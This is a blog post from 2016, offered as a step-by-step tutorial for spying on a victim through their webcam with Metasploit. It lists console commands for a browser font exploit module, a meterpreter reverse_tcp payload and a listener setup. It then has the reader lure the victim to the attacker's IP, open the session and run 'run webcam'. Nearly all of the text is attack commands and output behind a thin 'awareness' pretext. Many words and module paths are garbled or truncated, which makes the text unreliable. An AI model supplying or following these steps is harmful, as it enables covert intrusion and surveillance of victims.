Wednesday, May 18, 2016

Webcam 2014 with Meta Sploit Full Tutorial



Our rl purpose is to show just how sy it is, so you will take better awareness that it can be done, and take security yourself.

Open Metasploit and run following commands:

msf> show s


msf>use /browser/_cooltype_sing


msf (_cooltype_sing)> set payload /meterpreter/reverse_tcp
payload=> /meterpreter/reverse_tcp


msf (_cooltype_sing) > show options


Module options (//browser/_cooltype_sing):


Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certifie (default is randomly erated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this (default is random)



Payload options (/meterpreter/reverse_tcp):


Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thrd, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port



target:

Id Name
-- ----
0 Automatic


msf (_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf (_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf (_cooltype_sing) > set uripath /
uripath => /
msf (_cooltype_sing) > set uripath /
uripath => /
msf (_cooltype_sing) > -j


Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.


msf (_cooltype_sing) > session -i 1


meterpreter> run webcam


and you will get the webcam of victim. :)

No comments:

Post a Comment